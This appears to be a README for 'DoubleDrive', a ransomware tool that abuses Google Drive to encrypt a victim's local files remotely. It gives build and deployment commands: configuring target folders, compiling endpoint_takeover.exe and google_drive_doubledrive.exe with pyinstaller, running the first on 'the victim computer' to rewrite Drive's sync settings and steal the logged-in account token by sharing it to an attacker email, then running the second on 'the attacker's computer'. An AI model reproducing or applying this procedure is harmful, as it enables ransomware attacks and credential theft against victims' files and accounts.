A DoubleDrive variant that uses Google Drive to encrypt local files remotely.
- Make sure you clone the DoubleDrive repo and install the DoubleDrive python package. If you are currently in the google_drive_doubledrive folder then run:
pip install ../- Use
config_setup.pyto setup the exact configuration you want for the ransomware. For example:
python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop- While you are in the google_drive_doubledrive folder, run:
pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\google_drive_doubledrive.py- A folder named
distwill be created. Inside you can findendpoint_takeover.exeandgoogle_drive_doubledrive.exe - Transfer
endpoint_takeover.exeto the victim computer and run it. This will change Google Drive's settings database to sync the target paths to encrypt. It will also extract the token of the currently logged in Google Drive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage.
Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time.
- On the attacker's computer, execute:
google_drive_doubledrive.exe